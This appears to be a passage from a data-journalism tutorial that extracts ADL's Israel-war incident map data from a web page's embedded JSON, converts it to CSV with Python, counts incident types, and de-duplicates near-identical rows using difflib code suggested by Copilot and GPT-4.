<p>JSON is <em>everywhere</em>, so if you want to do this type of work, it's important to understand how it works and how to work with it.</p>
<p>This JSON object has a <code>lines</code> key that's an empty array, followed by a <code>points</code> key that is an array of points. Each point looks like it's an incident on ADL's map. It includes a <code>color</code> (which is a category, like "Assault"), <code>lat</code> and <code>lon</code> GPS coordinates, <code>metadata</code> about the incident, a <code>name</code> (which is just the date, like "10/7/2023"), and a <code>value</code> that seems to be an empty array.</p>
<p>The <code>metadata</code> is an array with 6 strings in it. It's pretty clear what most of them mean, but not so much the last item. Here's the metadata from above:</p>
<div class="hll"><pre><span></span><span class="nt">"metadata"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"10/7/2023"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"An individual wearing jewelry with Jewish symbols was allegedly assaulted by an attacker who grabbed their necklace and ring and shouted antisemitic statements."</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"San Diego"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"California"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Assault"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"No"</span>
<span class="p">],</span>
</pre></div>
<p>It looks like this metadata is ordered like this:</p>
<ul>
<li>date</li>
<li>description</li>
<li>city</li>
<li>state</li>
<li>category</li>
<li>some boolean value of "Yes" or "No"</li>
</ul>
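<p>Since the order is fixed, each metadata array can be pulled apart by position in Python. Here's a sketch using the first point's metadata from above; at this stage, the field names are just my guesses:</p>

```python
# The first point's metadata array, copied from the formatted JSON above
metadata = [
    "10/7/2023",
    "An individual wearing jewelry with Jewish symbols was allegedly "
    "assaulted by an attacker who grabbed their necklace and ring and "
    "shouted antisemitic statements.",
    "San Diego",
    "California",
    "Assault",
    "No",
]

# Unpack by position -- these variable names are my guesses at this point
date, description, city, state, category, yes_or_no = metadata
print(date, city, state, category, yes_or_no)
```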
<p>I looked back at the <code>map.html</code> code and saw that there's also a JavaScript variable defined called <code>_Flourish_data_column_names</code>. Doing the same thing -- copying and pasting it into its own file in VS Code, and then formatting it, here's what that variable contains:</p>
<div class="hll"><pre><span></span><span class="p">{</span>
<span class="w"> </span><span class="nt">"lines"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"geometry"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span>
<span class="w"> </span><span class="p">},</span>
<span class="w"> </span><span class="nt">"points"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"color"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Incident Type"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"lat"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Latitude"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"lon"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Longitude"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"metadata"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"Date of Incident"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Description"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"City"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"State"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Incident Type"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Israel/Zionism-related"</span>
<span class="w"> </span><span class="p">],</span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Date of Incident"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"value"</span><span class="p">:</span><span class="w"> </span><span class="p">[]</span>
<span class="w"> </span><span class="p">},</span>
<span class="w"> </span><span class="nt">"regions"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"FIPS"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"metadata"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"NAME"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"value"</span><span class="p">:</span><span class="w"> </span><span class="p">[]</span>
<span class="w"> </span><span class="p">},</span>
<span class="w"> </span><span class="nt">"regions_geometry"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"geometry"</span><span class="p">:</span><span class="w"> </span><span class="s2">"geometry"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"id"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"FIPS"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"STUSPS"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"NAME"</span>
<span class="w"> </span><span class="p">]</span>
<span class="w"> </span><span class="p">}</span>
<span class="p">}</span>
</pre></div>
<p>And there's the key that describes this data. The metadata array is in this order:</p>
<ul>
<li>Date of Incident</li>
<li>Description</li>
<li>City</li>
<li>State</li>
<li>Incident Type</li>
<li>Israel/Zionism-related</li>
</ul>
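<p>Since the column names and each point's metadata are in the same order, zipping the two arrays together labels every value. A quick sketch in Python, using the first point from above:</p>

```python
# Column names from _Flourish_data_column_names
column_names = [
    "Date of Incident",
    "Description",
    "City",
    "State",
    "Incident Type",
    "Israel/Zionism-related",
]

# One point's metadata from _Flourish_data
metadata = [
    "10/7/2023",
    "An individual wearing jewelry with Jewish symbols was allegedly "
    "assaulted by an attacker who grabbed their necklace and ring and "
    "shouted antisemitic statements.",
    "San Diego",
    "California",
    "Assault",
    "No",
]

# Pair each column name with its value
labeled = dict(zip(column_names, metadata))
print(labeled["City"])
```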
<h2 id="converting-the-json-to-a-csv-spreadsheet">Converting the JSON to a CSV spreadsheet</h2><p>I have the raw data that's used to draw points on ADL's map, but it would be considerably easier to read and work with if it were in a spreadsheet format rather than a JSON array of points. So, I wrote a simple Python script to convert this into a CSV spreadsheet.</p>
<p>Chapters 7 and 8 of my book include a basic introduction to Python programming -- intended for total newbies who have never written code before -- in order to do simple data analysis tasks just like this. And Chapter 9 of my book goes into detail on working with spreadsheets in CSV (comma-separated value) format -- making use of the hundreds of CSV files in the BlueLeaks dataset, hacked from police departments in the middle of the 2020 Black Lives Matter uprising.</p>
<p>CSVs are the simplest type of spreadsheet, and like JSON data, CSV data is <em>everywhere</em>.</p>
<p>Here's the first version of the Python script that I wrote, called <code>extract-incidents.py</code>:</p>
<div class="hll"><pre><span></span><span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">csv</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="c1"># Load html from file</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"map.html"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">html</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="c1"># Extract data from HTML</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">html</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">):</span>
<span class="k">if</span> <span class="s2">"_Flourish_data = "</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="n">data_json</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"_Flourish_data = "</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span>
<span class="n">data_json</span> <span class="o">=</span> <span class="n">data_json</span><span class="o">.</span><span class="n">strip</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="c1"># strip trailing comma</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">json</span><span class="o">.</span><span class="n">loads</span><span class="p">(</span><span class="n">data_json</span><span class="p">)</span>
<span class="c1"># Save data points as CSV</span>
<span class="n">rows</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">[</span>
<span class="s2">"Date of Incident"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">,</span>
<span class="p">]</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"adl-data.csv"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">writer</span> <span class="o">=</span> <span class="n">csv</span><span class="o">.</span><span class="n">DictWriter</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">fieldnames</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writeheader</span><span class="p">()</span>
<span class="k">for</span> <span class="n">point</span> <span class="ow">in</span> <span class="n">data</span><span class="p">[</span><span class="s2">"points"</span><span class="p">]:</span>
<span class="n">row</span> <span class="o">=</span> <span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">2</span><span class="p">],</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">3</span><span class="p">],</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">4</span><span class="p">],</span>
<span class="p">}</span>
<span class="n">rows</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writerow</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Number of rows: </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">rows</span><span class="p">)</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</pre></div>
<p>My script works like this:</p>
<ul>
<li>It opens <code>map.html</code> and loads its contents into a variable called <code>html</code>.</li>
<li>It searches each line in the <code>html</code> variable for the string <code>_Flourish_data =</code>, and if it finds it, it does a bit of string slicing to pull out just the JSON string containing the data, saving it in the variable <code>data_json</code>.</li>
<li>It then loads the raw data into the variable <code>data</code> by setting it equal to <code>json.loads(data_json)</code> -- so now, <code>data</code> is a Python dictionary containing all of the raw data.</li>
<li>It uses <code>csv.DictWriter()</code> to create a new CSV file called <code>adl-data.csv</code> with the column headers set to the same fields in the metadata (except for "Israel/Zionism-related" -- I decided to leave that one out of my spreadsheet).</li>
<li>It loops through all of the points in the map (<code>data["points"]</code>), and for each point writes a row to the new CSV.</li>
<li>It displays the number of rows in the final CSV that it created.</li>
</ul>
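<p>The extraction logic in the steps above can be exercised on a miniature stand-in for <code>map.html</code>. The stand-in data here is mine, trimmed down for illustration:</p>

```python
import json

# A miniature stand-in for map.html -- the real file is about 1MB
html = """<script>
_Flourish_data = {"lines":[],"points":[{"color":"Assault","metadata":["10/7/2023","description","San Diego","California","Assault","No"]}]},
</script>"""

data = None
for line in html.split("\n"):
    if "_Flourish_data = " in line:
        # Remove the JavaScript assignment, leaving just the JSON string
        data_json = line.replace("_Flourish_data = ", "")
        data_json = data_json.strip()[:-1]  # strip the trailing comma
        data = json.loads(data_json)

print(len(data["points"]))
```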
<p>When I ran it, I got 1,502 rows:</p>
<pre><code>% python3 extract-incidents.py
Number of rows: 1502
</code></pre>
<p>Now I have a file called <code>adl-data.csv</code>. Here's what it looks like when I open it in Excel:</p>
<p><img src="adl-data-excel.png" alt="Viewing the extracted ADL incident data in Excel"></p>
<p>The first thing that's obvious is that this data is full of duplicates. But I'll deal with that in a minute.</p>
<p>CSV files are the simplest spreadsheet format, and they don't contain any of the advanced features of spreadsheet software like Excel, LibreOffice Calc, or Google Sheets. So here's how I worked with the spreadsheet next:</p>
<ul>
<li>I save this file in Excel format (<code>.xlsx</code>).</li>
<li>I click View at the top, and click Freeze Top Row. This freezes the top row because it contains column headers, allowing me to scroll down and still see the headers.</li>
<li>I click Data at the top, and then I click Sort. This allows me to sort the spreadsheet first by one column, then by another, and so on. While doing this reporting, I frequently re-sorted the spreadsheet in order to easily find specific rows. In this case, I'm sorting by Incident Type, then Date of Incident, then State, then City.</li>
</ul>
<p><img src="excel-sorting.png" alt="Sorting a spreadsheet in Excel"></p>
<p>Now that it's sorted by Incident Type, I can see that Anti-Israel Rallies is the type at the top.</p>
<p>I immediately see that the "Anti-Israel Rally" rows don't include descriptions -- they just have dates, cities, and incident types. Since the outbreak of the Israel-Gaza war, the anti-war movement has surged, and some cities have seen multiple protests and direct actions calling for a ceasefire on the same day, organized by different groups. ADL's data doesn't make it clear which specific event each row is referring to. While I discovered dozens of Jewish-organized peace protests that match the dates and cities in ADL's data, it's impossible to know for sure if those are the specific "Anti-Israel Rallies" that ADL is referring to without asking them. An ADL spokesperson confirmed to me that most (but not all) of a set of 10 specific Jewish-organized protests I sent them were on their map -- some were not, though, so for those ADL must have been referring to different events.</p>
<h2 id="counting-rows-in-the-spreadsheet">Counting rows in the spreadsheet</h2><p>Here's how I determine how many rows of each type of incident this data contains.</p>
<p>I click on a cell in the first "Anti-Israel Rally" row at the top of the spreadsheet, then scroll down until I see the last "Anti-Israel Rally" row, hold Shift, and click on a cell in that row. This selects all of the "Anti-Israel Rally" rows. At the bottom of the window in Excel, I can see that I have selected 471 rows.</p>
<p><img src="excel-counting.png" alt="Counting &quot;Anti-Israel Rallies&quot; in Excel"></p>
<p>Repeating these steps with the other incident types, I found that this data includes the following number of rows for each incident type:</p>
<ul>
<li>Anti-Israel Rally: 471</li>
<li>Anti-Israel Rally w. Support for Terror: 171</li>
<li>Assault: 41</li>
<li>Harassment: 576</li>
<li>Vandalism: 243</li>
</ul>
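<p>Clicking and shift-clicking works, but the same tally can be computed in a few lines of Python with <code>collections.Counter</code>. Here's a sketch on stand-in rows; with the real data you'd read <code>adl-data.csv</code> from disk instead:</p>

```python
import csv
import io
from collections import Counter

# A few stand-in rows; in practice, use open("adl-data.csv") instead of io.StringIO
sample_csv = """Date of Incident,Description,City,State,Incident Type
10/7/2023,Example description,San Diego,California,Assault
10/8/2023,Example description,Everett,Washington,Harassment
10/8/2023,Example description,Everett,Washington,Harassment
"""

# Tally how many rows there are of each incident type
counts = Counter(row["Incident Type"] for row in csv.DictReader(io.StringIO(sample_csv)))
print(counts)
```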
<p>However, these numbers aren't quite accurate yet, because I haven't taken into account the obvious duplicates.</p>
<h2 id="looking-into-the-duplicates">Looking into the duplicates</h2><p>Looking back at the Assault, Harassment, and Vandalism data, it's clear that there are duplicates. For example, there are two rows that have these exact same values:</p>
<ul>
<li>Date of Incident: 10/12/23</li>
<li>Description:<blockquote><p>A student posted a photo of another student performing a Nazi salute with the caption "These Jewish kids better watch themselves on Halloween" on a Snapchat story, which was visible to Jewish classmates.</p>
</blockquote>
</li>
<li>City: Everett</li>
<li>State: Washington</li>
<li>Incident Type: Harassment</li>
</ul>
<p>Since these two rows are exactly the same, they are obviously duplicates. However, there are rows where the descriptions don't match exactly, but are so similar that they appear to be duplicates anyway -- it looks like maybe the description was updated to fix a typo, and the old data point remained after the fix. For example, there are two rows that both document Harassment that occurred October 10 in Asheville, NC, but one row has this description:</p>
<blockquote><p>A rabbi received harassing antisemitic emails that <strong>defended</strong> the Holocaust and Hamas's attack on Israel.</p>
</blockquote>
<p>And another has this description:</p>
<blockquote><p>A rabbi received harassing antisemitic emails that <strong>justified</strong> the Holocaust and Hamas's attack on Israel.</p>
</blockquote>
<p>Even though one says "defended" and the other says "justified", I think that these rows are duplicates of the same incident, and when someone at ADL updated the description it kept the original row in the dataset.</p>
<p>Note that <em>I don't think this means ADL is miscounting the antisemitic incident data that it's reporting</em>. Everything I've seen shows that ADL does not appear to be counting duplicates in its statistics; they just happen to appear on the map for some reason.</p>
<p>If you load ADL's Stand With Israel map, zoom in on Asheville, NC, and toggle off all of the categories except Harassment, you'll see a blue dot over Asheville. When you mouse-over it, it shows this incident, with the word "justified" instead of "defended".</p>
<p><img src="asheville-harassment1.png" alt="Viewing an antisemitic incident point in Asheville, NC"></p>
<p>I then opened <code>map.html</code> in VS Code and searched for this incident in the HTML. I found that the enormous <code>_Flourish_data</code> line includes this piece of data (which I've formatted using VS Code, so that you can actually read it):</p>
<div class="hll"><pre><span></span><span class="p">{</span>
<span class="w"> </span><span class="nt">"color"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Harassment"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"lat"</span><span class="p">:</span><span class="w"> </span><span class="mf">35.60271</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"lon"</span><span class="p">:</span><span class="w"> </span><span class="mf">-82.5673</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"metadata"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"10/10/2023"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"A rabbi received harassing antisemitic emails that justified the Holocaust and Hamas's attack on Israel."</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Asheville"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"North Carolina"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Harassment"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"No"</span>
<span class="w"> </span><span class="p">],</span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"10/10/2023"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"value"</span><span class="p">:</span><span class="w"> </span><span class="p">[]</span>
<span class="p">},</span>
</pre></div>
<p>I deleted that from <code>_Flourish_data</code>, saved <code>map.html</code>, and then opened <code>map.html</code> in my browser so I could view the modified version of this HTML file locally. Again, I zoomed into Asheville and toggled off all the categories except Harassment. This time, the circle at Asheville is a slightly lighter shade of blue, and when I mouse-over it, it shows the other duplicate incident, with the word "defended" instead of "justified":</p>
<p><img src="asheville-harassment2.png" alt="Viewing the duplicate antisemitic incident point in Asheville, NC"></p>
<p>By deleting bits of data from <code>map.html</code> and then refreshing the page to view the map, I discovered a few things:</p>
<ul>
<li>All of the points in this data are in fact getting mapped, even the duplicates.</li>
<li>The darker the circle on the map, the more points are drawn over each other -- this may be because of duplicates, or because of multiple incidents (perhaps on different dates) in the same city.</li>
<li>If multiple points are drawn in the same city, ADL's interface only allows you to look at the <em>top-most point that was drawn</em> -- the other incidents are technically drawn on the map, but you can't mouse-over them because the top point is in the way. You can't see them, but they're there.</li>
</ul>
<p>Now that I have an understanding of how the duplicates in this dataset work, I need to de-dupe it.</p>
<h2 id="de-duplicating-the-data">De-duplicating the data</h2><p>To de-dupe the data, I wrote some more Python code, this time with the help of AI -- specifically, <a href="https://github.com/features/copilot">GitHub Copilot</a> (a code-writing AI that you can integrate into VS Code) and ChatGPT. I could have done it without AI, but doing it with AI saved a lot of time.</p>
<p>My Python script so far loads <code>map.html</code>, extracts the data, and saves it as <code>adl-data.csv</code>. Every row of data in the spreadsheet is saved in a variable called <code>rows</code>. To de-dupe the data, I want to remove all of the duplicates from the <code>rows</code> list and then save that into a new, de-duped version of the CSV.</p>
<p>I decided to start with the easy ones and de-duplicate exact matches. Since I have GitHub Copilot set up in VS Code and logged in, I just wrote a comment saying something like:</p>
<div class="hll"><pre><span></span><span class="c1"># This function takes in a list of dictionaries, and returns a de-duplicated list,</span>
<span class="c1"># where a duplicate is an item where all of the keys in its dictionary are exactly</span>
<span class="c1"># the same as another item.</span>
</pre></div>
<p>And, lo and behold, GitHub Copilot auto-suggested the following function for me:</p>
<div class="hll"><pre><span></span><span class="k">def</span> <span class="nf">dedupe_exact_matches</span><span class="p">(</span><span class="n">items</span><span class="p">,</span> <span class="n">key</span><span class="p">):</span>
<span class="n">seen</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
<span class="n">result</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">items</span><span class="p">:</span>
<span class="n">val</span> <span class="o">=</span> <span class="nb">tuple</span><span class="p">(</span><span class="n">item</span><span class="p">[</span><span class="n">k</span><span class="p">]</span> <span class="k">for</span> <span class="n">k</span> <span class="ow">in</span> <span class="n">key</span><span class="p">)</span>
<span class="k">if</span> <span class="n">val</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">seen</span><span class="p">:</span>
<span class="n">seen</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">val</span><span class="p">)</span>
<span class="n">result</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">item</span><span class="p">)</span>
<span class="k">return</span> <span class="n">result</span>
</pre></div>
<p>I added this function to my script, and then after saving <code>adl-data.csv</code>, I added the following code:</p>
<div class="hll"><pre><span></span><span class="c1"># Dedupe</span>
<span class="n">rows</span> <span class="o">=</span> <span class="n">dedupe_exact_matches</span><span class="p">(</span><span class="n">rows</span><span class="p">,</span> <span class="n">headers</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Number of rows after de-duping exact matches: </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">rows</span><span class="p">)</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="c1"># Save the de-duped CSV</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"adl-data-deduped.csv"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">writer</span> <span class="o">=</span> <span class="n">csv</span><span class="o">.</span><span class="n">DictWriter</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">fieldnames</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writeheader</span><span class="p">()</span>
<span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">rows</span><span class="p">:</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writerow</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
</pre></div>
<p>When I run my script, here's the output:</p>
<pre><code>% python3 extract-incidents.py
Number of rows: 1502
Number of rows after de-duping exact matches: 1263
</code></pre>
<p>I can see that 239 rows, all exact duplicates, were deleted. The script saves the file <code>adl-data-deduped.csv</code>. When I open it, I can see that many of the duplicates are gone; however, there are still duplicates that aren't exact matches.</p>
<p>For example, after opening <code>adl-data-deduped.csv</code> in Excel, I can see that there are duplicate rows from an incident in Clifton, New Jersey on October 7. One of them has the description:</p>
<blockquote><p>An individual shouted ?Long live Hamas? at a synagogue during Simchat Torah celebrations.</p>
</blockquote>
<p>The other has the description:</p>
<blockquote><p>An individual shouted "Long live Hamas" at a synagogue during Simchat Torah celebrations.</p>
</blockquote>
<p>The first one used question marks instead of quotes, while the second one used quotes -- this looks like another example of someone correcting a typo in the description of an incident, but instead just adding a second incident.</p>
<p>At this point, I could have chosen to manually de-dupe the rest of the spreadsheet and leave it at that. And, at first, this is exactly what I did: in Excel, I sorted the spreadsheet so that potential duplicates would be next to each other, then looked through each of the 1,263 rows for duplicates, deleting one of each pair I found.</p>
<p>But since this reporting took me a little over a week, since ADL was constantly updating their map, and since every day activists took to the streets in dozens of new Palestinian solidarity protests (or "anti-Israel rallies," in ADL's language), I realized that I'd want to reload the map and get later versions of the dataset -- and I didn't want to have to manually de-dupe the spreadsheet again each time I did.</p>
<p>I figured it must be possible to measure a numeric "distance" between two descriptions. If the distance was small enough (if the descriptions were almost the same), then I could consider them duplicates. If the distance was large (if they're two totally different sentences), I could conclude that they're not duplicates. I wasn't sure of the simplest way to do this in Python, though, so I asked ChatGPT. I have a ChatGPT Plus account, giving me access to GPT-4, which is considerably better at this sort of thing than the free GPT-3.5.</p>
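<p>The kind of "distance" I had in mind can be sketched with Python's standard-library <code>difflib</code> -- this is my own illustration, not the code GPT-4 gave me:</p>

```python
from difflib import SequenceMatcher

# Two near-duplicate descriptions from the ADL data, and one unrelated description
a = 'An individual shouted "Long live Hamas" at a synagogue during Simchat Torah celebrations.'
b = 'An individual shouted ?Long live Hamas? at a synagogue during Simchat Torah celebrations.'
c = "A rabbi received harassing antisemitic emails."

# ratio() returns 1.0 for identical strings and approaches 0 for unrelated ones
print(SequenceMatcher(None, a, b).ratio())  # nearly 1: likely duplicates
print(SequenceMatcher(None, a, c).ratio())  # much lower: different incidents
```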
<p>I asked GPT-4 the following query, using real examples of duplicates as well as non-duplicates from the ADL dataset:</p>
<blockquote><p>Write a Python function for me called <code>is_duplicate()</code>. This function should take two dictionaries, like <code>row1</code> and <code>row2</code>, and determine if they are duplicate rows. It should return True if they're likely duplicates and False if they're not.</p>
<p>First, it should compare all of the fields in the two rows, and if any of them other than <code>Description</code> are different, it should return False, as these are not duplicates.</p>
<p>Then, it should measure the "distance" between the descriptions of these two rows (<code>row1["Description"]</code> and <code>row2["Description"]</code>). If the descriptions are very similar, it should consider them duplicates. If the descriptions are not similar, it should consider them not duplicates.</p>
<p>Here are descriptions that are similar enough to be duplicates:</p>
<ul>
<li>An individual shouted "Long live Hamas" at a synagogue during Simchat Torah celebrations.</li>
<li>An individual shouted ?Long live Hamas? at a synagogue during Simchat Torah celebrations.</li>
</ul>
<p>Here's another example of duplicates:</p>
<ul>
<li>After noticing two visibly Jewish people speaking Hebrew, an individual followed the victims and screamed "Allahu Akbar."</li>
<li>After noticing two visibly Jewish people speaking Hebrew, an individual followed the victims and screamed "Allahu Akbar" at them.</li>
</ul>
<p>And here's another example of duplicates:</p>
<ul>
<li>During an anti-Israel rally, protestors made anti-Zionist comments such as "Zionism has got to go," praised violence against Israeli civilians and displayed antisemitic symbols including a swastika and the flag of Hamas.</li>
<li>During an anti-Israel rally, protestors made anti-Zionist comments such as "Zionism has got to go," praised violence against Israeli civilians and displayed antisemitic symbols, including a swastika.</li>
</ul>
<p>Here's an example of descriptions that are NOT duplicates:</p>
<ul>
<li>Swastika graffiti was left on the garage door of a home.</li>
<li>Swastikas were spray-painted on a playground.</li>
</ul>
<p>Here's another example of descriptions that are NOT duplicates:</p>
<ul>
<li>An individual wearing a Nazi uniform entered a restaurant.</li>
<li>Extremist individuals distributed antisemitic propaganda the Fort Worth Botanic Garden.</li>
</ul>
</blockquote>
<p>Here's the code that GPT-4 gave me:</p>
<div class="hll"><pre><span></span><span class="kn">import</span> <span class="nn">difflib</span>
<span class="k">def</span> <span class="nf">is_duplicate</span><span class="p">(</span><span class="n">row1</span><span class="p">,</span> <span class="n">row2</span><span class="p">):</span>
<span class="c1"># Check if any field other than 'Description' is different</span>
<span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">row1</span><span class="p">:</span>
<span class="k">if</span> <span class="n">key</span> <span class="o">!=</span> <span class="s1">'Description'</span> <span class="ow">and</span> <span class="n">row1</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">!=</span> <span class="n">row2</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="c1"># Compare descriptions using a simple similarity measure</span>
<span class="n">similarity</span> <span class="o">=</span> <span class="n">difflib</span><span class="o">.</span><span class="n">SequenceMatcher</span><span class="p">(</span><span class="kc">None</span><span class="p">,</span> <span class="n">row1</span><span class="p">[</span><span class="s1">'Description'</span><span class="p">],</span> <span class="n">row2</span><span class="p">[</span><span class="s1">'Description'</span><span class="p">])</span><span class="o">.</span><span class="n">ratio</span><span class="p">()</span>
<span class="c1"># Define a threshold for similarity (e.g., 0.8)</span>
<span class="n">threshold</span> <span class="o">=</span> <span class="mf">0.8</span>
<span class="k">return</span> <span class="n">similarity</span> <span class="o">>=</span> <span class="n">threshold</span>
<span class="c1"># Example usage</span>
<span class="n">row1</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'Field1'</span><span class="p">:</span> <span class="s1">'Value1'</span><span class="p">,</span> <span class="s1">'Field2'</span><span class="p">:</span> <span class="s1">'Value2'</span><span class="p">,</span> <span class="s1">'Description'</span><span class="p">:</span> <span class="s1">'An individual shouted "Long live Hamas" at a synagogue during Simchat Torah celebrations.'</span><span class="p">}</span>
<span class="n">row2</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'Field1'</span><span class="p">:</span> <span class="s1">'Value1'</span><span class="p">,</span> <span class="s1">'Field2'</span><span class="p">:</span> <span class="s1">'Value2'</span><span class="p">,</span> <span class="s1">'Description'</span><span class="p">:</span> <span class="s1">'An individual shouted ?Long live Hamas? at a synagogue during Simchat Torah celebrations.'</span><span class="p">}</span>
<span class="nb">print</span><span class="p">(</span><span class="n">is_duplicate</span><span class="p">(</span><span class="n">row1</span><span class="p">,</span> <span class="n">row2</span><span class="p">))</span> <span class="c1"># Should return True for similar descriptions</span>
</pre></div>
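<p>To get a feel for that 0.8 threshold, it's worth seeing what <code>ratio()</code> actually returns for a real duplicate pair versus two unrelated descriptions -- a minimal illustration, separate from the scripts in this post:</p>

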